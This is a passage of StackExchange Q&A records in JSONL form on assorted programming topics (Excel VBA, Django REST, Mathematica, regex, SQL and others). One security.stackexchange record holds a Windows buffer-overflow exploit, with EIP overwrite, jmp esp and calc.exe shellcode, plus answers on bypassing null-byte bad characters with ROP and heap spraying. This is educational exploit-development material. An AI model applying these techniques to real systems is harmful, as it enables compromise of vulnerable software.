Accounting: 4, Double Accounting: 5\n If .Interior.ColorIndex = -4142 Then 'If cell is No fill then do nothing\n ArrFormat(6) = .Interior.ColorIndex 'Number\n Else\n ArrFormat(6) = .Interior.Color\n End If\n ArrFormat(7) = .Borders(xlLeft).Color 'Number\n ArrFormat(8) = .Borders(xlLeft).LineStyle 'Use only the left border style of the source cell & apply to whole destination cell\nEnd With\n\n ArrFormat(9) = StopIfTrue 'Boolean\n\nTargetRange.FormatConditions.Add Type:=xlExpression, Formula1:=ValidFormula 'Add new cond formating\nTargetRange.FormatConditions(TargetRange.FormatConditions.Count).SetFirstPriority\nWith TargetRange.FormatConditions(1)\n .Font.Color = ArrFormat(1)\n .Font.Size = ArrFormat(2)\n....\n<\/code>\nThe code stops at <code>.Font.Size = ArrFormat(2)<\/code> line with \"unable to set the size property of the font class\" error. I researched many places, including here, but my sheet is not protected at all.\n\nFYI, the range CellFormat is the first column in the selected range in the photo above. I will apply the formats of these cells to the conditional formats of the destination cells (3rd column).\nFurthermore, the line above it, <code>.Font.Color = ArrFormat(1)<\/code>, ran without problems.\nHere is the screenshot of the error. As u can see font size is 11.\n\nCan somebody help?\nComment: What `Range` are you passing as `CellFormat`? Are you sure `.Font.Size` is not `Null`.\nComment: @BigBen I updated above. Tks for ur comments.\nAnswer: Simple answer: You cannot set the font name or size for conditional formatting. This is not related to <code>VBA<\/code>, but to Excel: If you set a conditional format for a cell using the regular Excel dialog, click the \"format\" button and select the <code>Font<\/code>-Tab, you see that <code>Font<\/code> and <code>Size<\/code> properties are disabled, you cannot select anything there:\n\nFound a good explanation here:\n\nConditional Formatting cannot do what you want, because it is meant to only give the appearance format changes, not really change the properties of cells. Different fonts have different styles and spacing. The presumption is that a larger size font would force the width of the column or height of the row to be changed, which would be a change to the worksheet object environment, which Conditional Formatting cannot do. If you want the font style to change you'd need to do it yourself or employ VBA\n","meta":{"source":"stackoverflow","title":"\"unable to set the size property of the font class\" error in Excel VBA for conditional formatting, sheet is NOT protected","dup_signals":{}},"subset":"stackexchange"} +{"text":"Shellcode not executing despite EIP being overwritten properly\n\nQuestion: Here is my exploit:\n<code>junk = b'A' * 1032\n\u200b\neip = b\"\\xf5\\x93\\x4a\\x00\" # some address where 'jmp esp' lives\n\nshellcode = b\"\"\nshellcode += b\"\\x33\\xc0\" # xor eax, eax\nshellcode += b\"\\x50\" # push eax\nshellcode += b\"\\x68\\x2E\\x65\\x78\\x65\" # push \".exe\"\nshellcode += b\"\\x68\\x63\\x61\\x6C\\x63\" # push \"calc\"\nshellcode += b\"\\x8B\\xC4\" # mov eax, esp\nshellcode += b\"\\x6A\\x01\" # push 1\nshellcode += b\"\\x50\" # push eax\nshellcode += b\"\\xBB\\x30\\xCD\\x07\\x77\" # mov ebx, 7707cd30 (location of winexec)\nshellcode += b\"\\xFF\\xD3\" # call ebx\n\u200b\nnopsled = b\"\\x90\" * 30\n\u200b\nwith open(\"exploit.txt\", \"wb\") as file:\n file.write(junk + eip + nopsled + shellcode)\n<\/code>\nEIP gets overwritten with the correct value, but it doesn't jump to the shellcode, is there something I am missing? I also tried with shellcode generated by <code>msfvenom<\/code> and it didn't work as well, so I think the problem is not the shellcode itself. I am 99% sure the problem is the <code>\\x00<\/code> from the EIP, but how can I omit it if the address of <code>jmp esp<\/code> contains it? There is no <code>jmp esp<\/code> in the binary without a leading <code>\\x00<\/code>.\nAnswer: You are right, the problem is the <code>\\x00<\/code> in <code>EIP<\/code>. This is commonly known as a bad character, you can find more bad chars here.\nTo bypass this issue, you need to use gadgets (Return-Oriented Programing) to jump to <code>ESP<\/code>, for example:\n<code>0x11223344 mov eax, esp\n...\nret\n<\/code>\nAnd a second gadget that jump to <code>EAX<\/code>:\n<code>0x55667788 jmp eax\n...\nret\n<\/code>\nIn this case, the final exploit should be:\n<code>with open(\"exploit.txt\", \"wb\") as file:\n file.write(junk + b\"\\x44\\x33\\x22\\x11\" + b\"\\x88\\x77\\x66\\x55\" + nopsled + shellcode)\n<\/code>\nComment: What if all the ROPs' addresses contain 00?\nAnswer: While using ROP is a viable option, you don't have to use ROP. There are several viable options:\n\nUse gadgets from a different .dll\/.so library with a better base address\nUse a relative jmp: <code>jmp esp-8<\/code> and shift your payload by 8 bytes\nUse a long NOP sled and jump to a fixed stack address which is hopefully within your NOP sled\nIf you control several registers load a pre-calculated address into say eax and use a gadget like <code>sub eax-48;call eax<\/code> to pivot to the <code>jmp esp<\/code> address\nSpray the heap and overwrite EIP to a fixed address like <code>0x0c0c0c0c<\/code>\nPut the payload in the junk portion of your payload and find a gadget that increments esp enough to hit inside your junk space then returns. This way you can use a partial overwrite of the address leaving the largest byte with its original value. Given that you're overwriting a return address there is a chance it already contained <code>0x004a????<\/code>\n\nThere are many ways to solve these corner cases and getting creative is certainly allowed.\n","meta":{"source":"security.stackexchange","title":"Shellcode not executing despite EIP being overwritten properly","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why is the Service Unavailable Error using Lapply?\n\nQuestion: I am using the spotifyr library where I want to find audio features for multiple tracks. For example I can do this in order to find the audio features of a specific song using it's id.\n<code>analysis2 <- get_track_audio_features(\"2xLMifQCjDGFmkHkpNLD9h\", \n authorization = get_spotify_access_token())\n<\/code>\nYesterday, I wrote this function below that takes all the tracks in a dataframe and finds the audio features for all of them and stores them in a list and it was working fine.\n<code>get_analysis <- function(track_id)\n{\n analysis <- get_track_audio_features(track_id, \n authorization = get_spotify_access_token()) \n}\n\ntracks_list <- lapply(all_tracks$track.id, get_analysis)\n<\/code>\nNow I am getting an error saying Request failed [503] and Error in get_track_audio_features(track_id, authorization = get_spotify_access_token()) : Service Unavailable (HTTP 503).\nI am still able to find the audio features of a specific song so I am not sure which service is unavailable.\nAnswer: I suspect you are reaching a song in your data for which the response is denied from spotify. You could try adding an error-catching mechanism to see which one it is:\n<code>get_analysis <- function(track_id){\n tryCatch(\n expr = {\n get_track_audio_features(track_id, authorization = get_spotify_access_token())\n }, \n error = function(e){\n print(track_id)\n }) -> analysis\n return(analysis)\n}\n\ntracks_list <- lapply(all_tracks$track.id, get_analysis) \n<\/code>\nI looked at the source code for the package and didn't see any sneaky rate-limiting issues and the Web API page shows error 503 as a generic error that needs waiting to be resolved (https:\/\/developer.spotify.com\/documentation\/web-api\/). Thus you could also try just adding a 10 minute wait (I couldn't find how long exactly it is on Spotify's website):\n<code>get_analysis <- function(track_id){\n tryCatch(\n expr = {\n get_track_audio_features(track_id, authorization = get_spotify_access_token()) -> output\n return(output)\n }, \n error = function(e){\n print(track_id)\n return(e)\n }) -> output\n}\n\nwait.function <- funciton(){\n Sys.sleep(600)\n}\n\nget_analysis_master <- function(all_tracks){\n k <- 1\n tracks_list <- list()\n for(track.id in all_tracks$track.id){\n get_analysis(track.id) -> output\n if(!inherits(output, \"error\")){\n tracks_list[[k]] <- output\n k <- k + 1\n } else {\n wait.function()\n }\n return(tracks_list)\n }\n \nget_analysis_master(all_tracks) -> tracks_list\n<\/code>\n","meta":{"source":"stackoverflow","title":"Why is the Service Unavailable Error using Lapply?","dup_signals":{}},"subset":"stackexchange"} +{"text":"PHP Webhost Operation Checking\n\nQuestion: I wanted perform checking if the PHP Webhost is complete whenever perform a update function, if everything doing fine then send an notification and let the Application know the Operation is Doing fine. \nBasically I wanted to know if the query in PHP work and use my application to notify the user.\nis there any way or method to do so?\nI using this method to fetch data from PHP in my React Native App\n<code>RecipeUpdation = () =>{\n const { ID } = this.state ;\n const { Name } = this.state ;\n const { Type } = this.state ;\n const { Ingredient } = this.state ;\n const { Step } = this.state ;\n\n return fetch('https:\/\/www.update.php', {\n method: 'POST',\n headers: {\n 'Accept': 'application\/json',\n 'Content-Type': 'application\/json',\n },\n body: JSON.stringify({\n\n RecipeID : ID,\n RecipeName : Name,\n RecipeType : Type,\n RecipeIngredient: Ingredient,\n RecipeStep: Step\n\n })\n\n }).then((response) => response.json())\n .then((responseJson) => {\n }).catch((error) => {\n console.error(error);\n });\n\n }\n<\/code>\nAnswer: Basically we can verify if the Operation in PHP is successful or not by Checking the Query Execution Status. A very Basic way to do the checking is using <code>If Else<\/code> to see if the Query Function return <code>True<\/code>(Success) or <code>False<\/code>(Fail). You can also always return some Message through <code>JsonResponds<\/code>.\nHere some example Code for PHP checking and Return Some Message:\n<code>\/\/ Using If Else to Check if operation Success or Not\nif(mysqli_query($connection,$Your_Query)){\n\n$MSG = 'Success' ;\n\n\/\/ Convert message into Json format first\n$json = json_encode($MSG);\n\n\/\/ This is where it return the message to Application.\n echo $json ;\n\n }\n else{\n\n $MSG = 'Failed' ;\n\n $json = json_encode($MSG);\n\n echo $json ;\n }\n<\/code>\nIn your Application Code you already have the implementation to retrieve the <code>JsonResponds<\/code>(the Message) which have been <code>echo<\/code> in the PHP Code, I would suggest use a simple method which is <code>Alert<\/code> to pop out the message in your React Native Application to notify the User the Operation Status.\n<code> }).then((response) => response.json())\n .then((responseJson) => {\n\n \/\/ this responseJson Already have the echo Message from PHP\n \/\/ just Display the Status with Alert Function\n Alert.alert(responseJson);\n\n }).catch((error) => {\n console.error(error);\n });\n<\/code>\nHope this would help.\n","meta":{"source":"stackoverflow","title":"PHP Webhost Operation Checking","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why this works, when it shouldnt ? passing by reference\n\nQuestion: Here is standard <code>Yii2<\/code> <code>SearchModel<\/code> <code>search<\/code> action\n<code>public function search($params, $cond)\n{\n $query = Service::find();\n\n $dataProvider = new ActiveDataProvider([\n 'query' => $query,\n ]);\n\n $this->load($params);\n\n $query->where(['param' => $value]); \/\/why this modified after it passed to provider?\n\n return $dataProvider;\n}\n<\/code>\nWhy theres <code>$query<\/code> is modified AFTER is passed as parameter to <code>ActiveDataProvider<\/code> and it works ? How array with params keeping reference to <code>$query<\/code> ?\nComment: Objects are always references, except if you clone it explicitly\nComment: [passing by reference](http:\/\/php.net\/manual\/en\/language.references.pass.php) is 'declared' in the function declaration, not when calling the function (=at runtime).\nComment: this `public function __construct($config = [])` is the declaration of the BaseObject, which `ActiveDataProvider` inherites from. Just for info (because I was searching for it).\nComment: But inside anonymous parameter, how it is possible ?\nComment: `$query` is passed in an array. So the prototype of `ActiveDataProvider` will have a parameter defined as an array\nComment: Thanks, I did search whole extend chain and not found BaseObject, only Object without __construct\nAnswer: <code>ActiveQuery<\/code> is mutable object, and in PHP objects are always passed by reference. In your case reference to <code>$query<\/code> is assigned to <code>$dataProvider->query<\/code>, so <code>$query<\/code> and <code>$dataProvider->query<\/code> points to the same object. Any modification of <code>$query<\/code> will be also reflected on <code>$dataProvider->query<\/code>.\nYou may read more about this in PHP documentation.\n","meta":{"source":"stackoverflow","title":"Why this works, when it shouldnt ? passing by reference","dup_signals":{}},"subset":"stackexchange"} +{"text":"how to improve image quality on Canvas.drawBitmap while merging two images?\n\nQuestion: I am using following code to merge 2 different bitmap into 1. \n<code>public Bitmap combineImages(Bitmap c, Bitmap s) { \nBitmap cs = null;\nint width, height = 0;\n\nwidth = c.getWidth() + (s.getWidth() \/ 2);\nheight = c.getHeight() + (s.getHeight() \/ 2);\n\ncs = Bitmap.createBitmap(width, height, Bitmap.Config.ARGB_8888);\n\nCanvas comboImage = new Canvas(cs);\n\ncomboImage.drawBitmap(c, 0f, 0f, null);\ncomboImage.drawBitmap(s, c.getWidth() - (s.getWidth() \/ 2), c\n .getHeight()\n - (s.getHeight() \/ 2), null);\nreturn cs;\n<\/code>\n}\nIt working good. But problem is that it make my image BLUR.\nBasically my full code is here. My Full Code What I am doing is converting my Base64 String images to Bitmap. What you think this may be issue?\nI just want to prevent BLUR to my images...\nComment: oh yes, I just make the 3 images of hdpi,mdpi,ldpi \"+\" image. and it works for me.\nWell you should not answer , but comment on my question.\nAnswer: oh yes, I just make the 3 images of hdpi,mdpi,ldpi \"+\" image with appropriate resolution. and it works for me.\n","meta":{"source":"stackoverflow","title":"how to improve image quality on Canvas.drawBitmap while merging two images?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Possible whitespace issue importing numbers from a text file. NonLinearModel crashes the kernel when weights are given\n\nQuestion: Update:\nThe data has been made available as a text file.\nIt is desired to use the <code>Weights<\/code> option with <code>NonlinearModelFit<\/code> and the direct coding gives the error message \"Wolfram Kernel for Windows has stopped working.\" Below the commands are given the import the data and run a few models. The first two work fine; the last one gives the error message given above.\n<code>data = Import[\"sample_data.txt\", \"Table\"];\n\n(* Create data for NonlinearModelFit *)\ndataWeights = data[[All, 3]];\ndataSpectrum = data[[All, {1, 2}]];\ndataWeightsN = dataWeights\/Max[dataWeights];\n\n(* This works *)\nnlm1 = NonlinearModelFit[dataSpectrum, a (x\/150.0)^(-2) + b (x\/150.0)^(-1),\n {{a, 449}, {b, -177}}, x];\nnlm1[\"BestFitParameters\"]\n(* {a -> 440.0413493307273`,b -> -174.44382871465248`} *)\n\n(* This works: dataSpectrum is multiplied by 1.0 and the Weights option is added *)\nnlm2 = NonlinearModelFit[1.0*dataSpectrum, a (x\/150.0)^(-2) + b (x\/150.0)^(-1),\n {{a, 449}, {b, -177}}, x, Weights -> dataWeightsN];\n\nnlm2[\"BestFitParameters\"] \n(* {a -> 430.15765125168565`,b -> -156.68960890633196`} *)\n\n(* This doesn't work. Original data and model with Weights are used *)\n(* Error message is \"Wolfram Kernel for Windows has stopped working\" *)\nnlm3 = NonlinearModelFit[dataSpectrum, a (x\/150.0)^(-2) + b (x\/150.0)^(-1),\n {{a, 449}, {b, -177}}, x, Weights -> dataWeightsN]\n<\/code>\nEnd of update\nHas anyone experience corruption while importing numbers from a textfile?\nThe issue I have is that nonlinear model fitting completes only without a weighting function, but the issue goes away if I modify my lists and arrays by multiplying them by 1.0 before feeding them to the NLM function. (or manually cutting and pasting the array values into the code works too, but that is way too manual as I may have to analyze 100 data sets)\nExample:\nI have 25 ordered pairs of numbers I wish to fit using NLM\ndataList={{90.5125000, 1001.3813546}, {91.5,977.38053}, {92.56, 966.23423}, and so on}.\nI have a weights list of 25 values in a list like\ndataWeights={0.85836, 0.577296, 0.2, 0.68656, 1, 0.23434, and so on}\nThis call doesn't work (meaning all variables turn blue)\n<code> z = NonlinearModelFit[datalist, a (x\/150.0)^(-2) + b(x\/150.0)^(-1), {a,b}, x, Weights -> dataWeights];\n<\/code>\nbut this one works\n<code>z = NonlinearModelFit[datalist, a (x\/150.0)^(-2) + b(x\/150.0)^(-1), {a,b}, x];\n<\/code>\nHowever, if I issue the command:\n<code>datalist=1.0*datalist;\n<\/code>\nboth calls work or if I cut and paste, both calls work.\ndatalist was created by the following Code\n<code>data = Import[\"filename.txt\", \"Table\"];\ndataWeights = data[[1 ;;, 3]];\ndatalist = data[[1 ;;, 1 ;; 2]];\n<\/code>\nSorry that I don't provide the data, as the problem goes away if I enter all of the data into this question with a cut and paste.\nSo the question boils down to Mathematica 11.1 - has anyone had experience with white space issues in text files containing numbers, and if yes, did you figure out what to do with your text file to make sure you didn't get problems in the future.\nComment: What do you mean by \"this one doesn't work\"? Does it give an error, do the values not make sense? Since you haven't included all the data, we cannot possibly reproduce the problem, so you'll need to be explicit about what the problem is.\nComment: end running the issue a bit, but this problem is not a nonlinear fit. (nor was the first one). Have you tried `LinearModelFit`? In any case 25 vals is not too much to post, just paste the whole thing into the question.\nComment: You should provide guesses for the parameters in the parameter list, in your case, just one, like {{a, guessforthisparameter}}, otherwise NonlinearModelFit starts evaluating expressions around a=1, where your function may be ill conditioned.\nComment: George, there are higher order polynomials that don't work either, but I did not show them.\nComment: Short answer is that it was a bug in Mathematica. Went away in 11.3\nAnswer: I've taken the weights from your previous post (which had 26 elements) and removed the last data point from above to get 26 elements.\n<code>datalist = {{140.1885986328125, 318.54713569102125}, {140.5792236328125, 316.3740245454749},\n {140.9698486328125, 314.1513044515799}, {141.3604736328125, 312.0074230752567},\n {141.7510986328125, 309.84565604848154}, {142.1417236328125, 307.7355334299345},\n {142.5323486328125 , 305.633670557817}, {142.9229736328125, 303.52814971608547},\n {143.3135986328125, 301.4927654142471}, {143.7042236328125, 299.4417704661457},\n {144.0948486328125, 297.4154292210221}, {144.4854736328125, 295.42313663398266},\n {144.8760986328125, 293.40462468351114}, {145.2667236328125, 291.4606242860452},\n {145.6573486328125, 289.4850824087863}, {146.0479736328125, 287.57533642316},\n {146.4385986328125, 285.65551629016227}, {146.8292236328125, 283.75135460154684},\n {147.2198486328125, 281.86934847149666}, {147.6104736328125, 280.03473502558626},\n {148.0010986328125, 278.1649121557317}, {148.3917236328125, 276.35675418061123},\n {148.7823486328125, 274.51855140060024}, {149.1729736328125, 272.7408232115596},\n {149.5635986328125, 270.96588244643533}, {149.9542236328125, 269.1897259023379}};\n\ndataWeights = {0.9987527, 0.99976478704084643, 0.999722848903, 0.9993126, \n 0.9997489, 0.99974733307567956, 0.98364314121504532, \n 0.99878819613270000, 0.99972987911051269, 0.99919462417872860, \n 0.92152614146854338, 0.99960687021314616, 0.99885219400497854, \n 0.99958609168318560, 0.807542606375684133, 0.358750462322291623, \n 0.99949217272776386, 0.99962266189591619, 0.99880149439187476, \n 0.99953788549367709, 0.99907244642256050, 0.99911067891768793, \n 0.87373801598284525, 0.87409790012176219, 0.98225430427248133, \n 0.515316685575128931};\n\nNonlinearModelFit[datalist, a (x\/150.0)^(-2), {a}, x] \/\/ Normal\n(* 6.16036582770958`*^6\/x^2 *)\n\nNonlinearModelFit[datalist, a (x\/150.0)^(-2), {a}, x, Weights -> dataWeights] \/\/ Normal\n(* 6.163821795620144`*^6\/x^2 *)\n<\/code>\nEverything seems to work fine. You just need to paste in the data and commands that you're having trouble with. If you've read the data from a file, just typing <code>datalist<\/code> and pasting in the output should get us the exact data you're using.\nComment: A pain? I just copied and pasted the data from the *Mathematica* notebook and pasted in the above answer. No pain at all.\nComment: I agree cutting-and-pasting thousands of times is not practical. However, when I mentioned cutting-and-pasting it was about providing a single minimal working example for us to work on.\nComment: Pasting would be a pain. But the simpler work around is easier. This works: datalist=1.0*datalist as well as datalist=Round[datalist, 0.000001]\nComment: I may have thousands of data sets to analyze - method must not have any manual steps, if I understand what you are suggesting.\nAnswer: I discovered that the problem was with my data somehow. I'm guessing there is something in the text file that is not importing correctly\nWhen I inserted\n<code>datalist = Round[datalist, 0.000000000001]; \n<\/code>\nor\n<code>datalist=1.0*datalist;\n<\/code>\nthe problem went away.\nVery strange, but it is a simple workaround that is working for me.\nsome bad whitespace somewhere?\nThe original data was imported from a text file with the commands\n<code>data = Import[\"datafile.txt\", \"Table\"];\ndatalist = data[[1 ;;, 1 ;; 2]];\ndatalist = Select[datalist, # != {#, 0} &];\n<\/code>\nComments welcome\nComment: You still haven't given enough information for anyone to make educated comments. We'd really like to solve the issue but we're just not getting clarification from you.\nComment: There you go, but I think the cutting and pasting has removed the issue, although I would have thought the import would have cleaned it up all by itself. I'm not sure how to upload a text file directly.\n","meta":{"source":"mathematica.stackexchange","title":"Possible whitespace issue importing numbers from a text file. NonLinearModel crashes the kernel when weights are given","dup_signals":{}},"subset":"stackexchange"} +{"text":"Should I create separate apns certificate for notification Service Extension and notification Content Extension?\n\nQuestion: I came to know that you have to create separate app Ids and separate provisioning profile for service extensions.When I checked the created ID for notification service extension it shows that push notifications are configurable.Should I create a new apns certificate for it or can i use the base apps apns certificate?\nComment: Yes, otherwise you can't implement push notification and you can follow this tutorial https:\/\/www.appcoda.com\/push-notification-ios\/\nAnswer: After testing it out myself,it is clear that although you have to create separate appIds and provisioning profiles for extensions,you don't need to create separate apns certificate.It will work with the base apns certificate.\nSo the answer is no,it doesn't require creating separate apns certificates.\nComment: Do need to enable Push Notifications\nunder the app services when create the app bundle id for extensions\n?\nComment: @HarshalBhavsar I have enabled the push notifcations but haven't created separate push certificate.\nComment: okey thanks for the update even without enabling it worked for me\n","meta":{"source":"stackoverflow","title":"Should I create separate apns certificate for notification Service Extension and notification Content Extension?","dup_signals":{}},"subset":"stackexchange"} +{"text":"how to do beanutils converter for arraylist to double array\n\nQuestion: I am trying to reconstruct a bean using BeanUtils. The BeanUtils.populate(obj,map) is almost exactly what I need except I think I need a converter as one of the things in the map is an arraylist but the bean needs an array[]. I have tried to write a converter for it but it doesn't go into the convert method. Calling populate gives IllegalArgumentException with message 'argument type mismatch'\nBean code:\n<code>public class TestObject implements Serializable \n{\n private double[] data;\n\n public double[] getData() {\n return data;\n }\n public void setData(double[] data) {\n this.data = data;\n }\n}\n<\/code>\nApplication Code:\n<code>public static void main(String[] args)\n{\n ConvertUtils.register(new DoubleArrayConverter(), double[].class);\n Map<String, Object> result = getMap();\n Class<?> clazz = Class.forName(\"com.test.TestObject\");\n Object obj = clazz.newInstance();\n BeanUtils.populate(obj, result);\n}\n<\/code>\nConverter code:\n<code>public class DoubleArrayConverter implements Converter \n{\n \/\/takes in an arraylist and returns a double[]\n public Object convert(Class arg0, Object arg1) \n {\n ArrayList list = (ArrayList)arg1;\n double[] data = Doubles.toArray(list);\n\n return data;\n }\n}\n<\/code>\nAnswer: After adding the Google library that includes Doubles\n<code>import com.google.common.primitives.Doubles;\n<\/code>\nand setting some values into the map\n<code> Map<String, Object> result = new HashMap<String, Object>();\n List<Double> listDouble = new ArrayList<Double>();\n listDouble.add(123.45);\n listDouble.add(678.90);\n result.put(\"data\", listDouble);\n<\/code>\nI was able to run your code and populate the bean. It is important that the map key 'data' agrees with the setData and getData methods.\nAre you sure your Map has an array list in it?\n","meta":{"source":"stackoverflow","title":"how to do beanutils converter for arraylist to double array","dup_signals":{}},"subset":"stackexchange"} +{"text":"add parameter to get_queryset request in Django REST Framework\n\nQuestion: I'm using <code>Django 2.0<\/code> and <code>Django REST Framework<\/code>.\nI have two models in contacts app\ncontacts\/models.py\n<code>class Contact(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n first_name = models.CharField(max_length=100)\n last_name = models.CharField(max_length=100, blank=True, null=True, default='')\n\nclass ContactPhoneNumber(models.Model):\n contact = models.ForeignKey(Contact, on_delete=models.CASCADE)\n phone = models.CharField(max_length=100)\n primary = models.BooleanField(default=False)\n\n def __str__(self):\n return self.phone\n<\/code>\ncontacts\/serializers.py\n<code>class ContactPhoneNumberSerializer(serializers.ModelSerializer):\n class Meta:\n model = ContactPhoneNumber\n fields = ('id', 'phone', 'primary', 'created', 'modified')\n<\/code>\nand contacts\/views.py\n<code>class ContactPhoneNumberViewSet(viewsets.ModelViewSet):\n serializer_class = ContactPhoneNumberSerializer\n\n def get_queryset(self):\n return ContactPhoneNumber.objects.filter(\n contact__user=self.request.user\n )\n<\/code>\nurls.py\n<code>router.register(r'contact-phone', ContactPhoneNumberViewSet, 'contact_phone_numbers')\n<\/code>\nWhat I want is following endpoints\n\nGET: <code>\/contact-phone\/{contact_id}\/<\/code> list phones numbers of particular contact\nPOST:<code>\/contact-phone\/{contact_id}\/<\/code> add phone numbers to particular contact\nPUT: <code>\/contact-phone\/{contact_phone_number_id}\/<\/code> update particular phone number\nDELETE: <code>\/contact-phone\/{contact_phone_number_id}\/<\/code> delete particular phone number\n\n<code>PUT<\/code> and <code>Delete<\/code> can be achieved as default action of <code>ModelViewSet<\/code> but how to make <code>get_queryset<\/code> to accept <code>contact_id<\/code> as required parameter?\n\nEdit 2\n\nI followed doc Binding ViewSets to URLs explicitly\nupdate app\/urls.py\n<code>router = routers.DefaultRouter()\nrouter.register(r'contacts', ContactViewSet, 'contacts')\ncontact_phone_number_view_set = ContactPhoneNumberViewSet.as_view({\n 'get': 'list\/<contact_pk>\/',\n 'post': 'create\/<contact_pk>\/',\n 'put': 'update',\n 'delete': 'destroy'\n})\nrouter.register(r'contact-phone-number', contact_phone_number_view_set, 'contact_phone_numbers')\n\nurlpatterns = [\n path('api\/', include(router.urls)),\n url(r'^admin\/', admin.site.urls),\n]\n<\/code>\nBut it is giving error \n<code>AttributeError: 'function' object has no attribute 'get_extra_actions'\n<\/code>\nAnswer: You can add extra actions to the viewset using <code>@action<\/code> decorator:\n<code>class ContactPhoneNumberViewSet(viewsets.ModelViewSet):\n serializer_class = ContactPhoneNumberSerializer\n\n def get_queryset(self):\n return ContactPhoneNumber.objects.filter(\n contact__user=self.request.user\n )\n\n @action(methods=['post'], detail=False)\n def add_to_contact(self, request, contact_id=None):\n contact = Contact.objects.get(id=contact_id)\n serializer = ContactPhoneNumberSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save(contact=contact)\n return Response(serializer.data)\n else:\n return Response(serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n\n @action(methods=['get'], detail=False)\n def set_password(self, request, contact_id=None):\n contact = Contact.objects.get(id=contact_id)\n serializer = PasswordSerializer(contact.contactphonenumber_set.all(), many=True)\n return Response(serializer.data)\n<\/code>\nUPD\nSince you don't need additional actions, you can override <code>retrieve<\/code> and <code>create<\/code> defaults methods:\n<code>class ContactPhoneNumberViewSet(viewsets.ModelViewSet):\n serializer_class = ContactPhoneNumberSerializer\n\n def get_queryset(self):\n return ContactPhoneNumber.objects.filter(\n contact__user=self.request.user\n )\n\n def create(self, request, pk=None):\n contact = Contact.objects.get(id=contact_id)\n serializer = ContactPhoneNumberSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save(contact=contact)\n return Response(serializer.data)\n else:\n return Response(serializer.errors,\n status=status.HTTP_400_BAD_REQUEST)\n\n def retrieve(self, request, pk=None):\n contact = Contact.objects.get(pk=pk)\n serializer = PasswordSerializer(contact.contactphonenumber_set.all(), many=True)\n return Response(serializer.data)\n<\/code>\nTo change standard <code>create<\/code> url use explicitly url binding:\n<code>contact_list = ContactPhoneNumberViewSet.as_view({\n 'get': 'list',\n 'post': 'create',\n 'put': 'update',\n 'delete': 'destroy'\n})\n\nurlpatterns = [\n path('api\/\/contact-phone\/<int:pk>\/', contact_list, name='contact-list'),\n url(r'^admin\/', admin.site.urls),\n]\n<\/code>\nComment: @AnujTBE Not sure, but I think it's impossible. The problem is you need somehow to deside inside `get_queryset` method if selected `kwarg` was `contact_phone_number_id` or `contact_id`. But without extra actions you cannot distinguish them.\nComment: Thanks for your help. used your first answer by defining extra action.\nComment: @AnujTBE Don't have chance to test it. Try to use action's url_path argument like this: `@action(methods=['post'], detail=False, url_path='delete_phone\/\/')`.\nComment: then I would have to disable `get_queryset` and `create` methods, because I do not want to list all phone numbers at once.\n\nAlso I want clean URL without adding extra action. can't I pass required additional parameter to `get_querset`?\nComment: distinguishing is based on request methods. with request methods `GET` and `POST` **contact_id** will be passed and with rest **contact_phone_number_id** will be passed.\nComment: @AnujTBE, Ah, yes it makes sense. I missed it. Probably binding viewset explicitly can help you also, check this part of the docs: http:\/\/www.django-rest-framework.org\/tutorial\/6-viewsets-and-routers\/#binding-viewsets-to-urls-explicitly Sorry dont have any other ideas at this time.\nComment: please see `Edit 2`\nComment: is there any way I can take `api` urls outside of `urlpatterns`. There should be only `api\/` in the `urlpatterns` others outside\nComment: @AnujTBE you can create separate `urls2.py` file, add there `path('contact-phone\/\/', contact_list, name='contact-list'),`. And include it to the main urls.py: `path('apu\/', include('urls2')),`. See this doc for details: https:\/\/docs.djangoproject.com\/en\/2.0\/topics\/http\/urls\/\nComment: Let us [continue this discussion in chat](https:\/\/chat.stackoverflow.com\/rooms\/171371\/discussion-between-anuj-tbe-and-neverwalkaloner).\nComment: can I pass `many=True` so that I could create multiple `phone_number` object? It's working fine for single object.\nComment: @AnujTBE I suppose it should work. Just pass with request list of objects and add many=True to serializer: `serializer = ContactPhoneNumberSerializer(data=request.data, many=True)`\nComment: Thanks. One more little help needed. Can I pass extra `kwargs` to the action so that I could implement `update` and `delete` methods on `phone_numbers` in the same `ViewSet` instead of writing a separate `ViewSet` like `url\/contact\/\/delete_phone\/\/`\nComment: I tried, but it gives `page not found` error. You can see https:\/\/stackoverflow.com\/q\/50425262\/3719167 for more detail\n","meta":{"source":"stackoverflow","title":"add parameter to get_queryset request in Django REST Framework","dup_signals":{}},"subset":"stackexchange"} +{"text":"best optimized sql query to select a single record name Jack from the list of 100 million record\n\nQuestion: best optimized performance specific sql query to select a single record name Jack from the list of 100 million record without using index\n<code>select name \nfrom table t1 \nwhere name = 'JACK' -- normal query \n<\/code>\nComment: https:\/\/use-the-index-luke.com\/\nComment: There is no other way to write this query. If you need to improve performance, you need an index (see Mudassir's link). Performance questions also heavily depend on the database product being used. \"SQL\" is just a query language, not the name of a specific product. Please add a [tag](https:\/\/stackoverflow.com\/help\/tagging) for the database product you are using `postgresql`, `oracle`, `sql-server`, `db2`, ...\nAnswer: Make index on your table\n<code>CREATE INDEX idx01 ON YOUR_TABLE_NAME (name);\n<\/code>\nComment: If there is no such index the best thing you can do for first is to ask someone who have permission to do it. If you use correct index, the query become a lot more faster.\nComment: what if we don't have permission to set up an index\n","meta":{"source":"stackoverflow","title":"best optimized sql query to select a single record name Jack from the list of 100 million record","dup_signals":{}},"subset":"stackexchange"} +{"text":"RegExp not getting everything after the first two new lines\n\nQuestion: I am trying to get everything after the first two <code>newlines<\/code> or <code>carriage returns<\/code>.\nI have tried this, but it isn't working. The third item in the array should be 5 lines, but it is only returning the first line after the two newlines. I tried using the <code>m<\/code> modifier but that isn't working either.\nWhat am I missing?\n\n<code>let text = `asdf\n\nasdfsdf\nasdf\n\nasdf\n23423\n\ndsfddfff`\nlet matches = text.match(\/^.+(\\r\\n\\r\\n|\\n\\n)(.+)\/)\nconsole.log(matches)<\/code>\nAnswer: You need the <code>s<\/code> modifier to make the dot match a newline, so that your final group captures everything afterwards. Also, when you do that, you'll need to alter the original <code>^.+<\/code> to make it match as little as possible, rather than as much as possible - so, make it lazy with <code>.+?<\/code>:\n\n<code>let text = `asdf\n\nasdfsdf\nasdf\n\nasdf\n23423\n\ndsfddfff`\nlet matches = 